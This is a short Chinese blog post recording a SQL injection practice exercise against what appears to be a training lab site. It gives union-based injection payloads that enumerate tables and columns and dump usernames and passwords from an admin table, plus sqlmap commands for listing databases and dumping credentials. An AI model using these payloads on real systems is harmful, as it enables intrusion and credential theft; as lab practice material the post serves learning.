SQL注入案例

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码


一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
倔强的石头_13 小时前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库
SelectDB14 小时前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
泯泷15 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷15 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
jiayou642 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE3 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr3 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫4 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩4 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
笃行3505 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库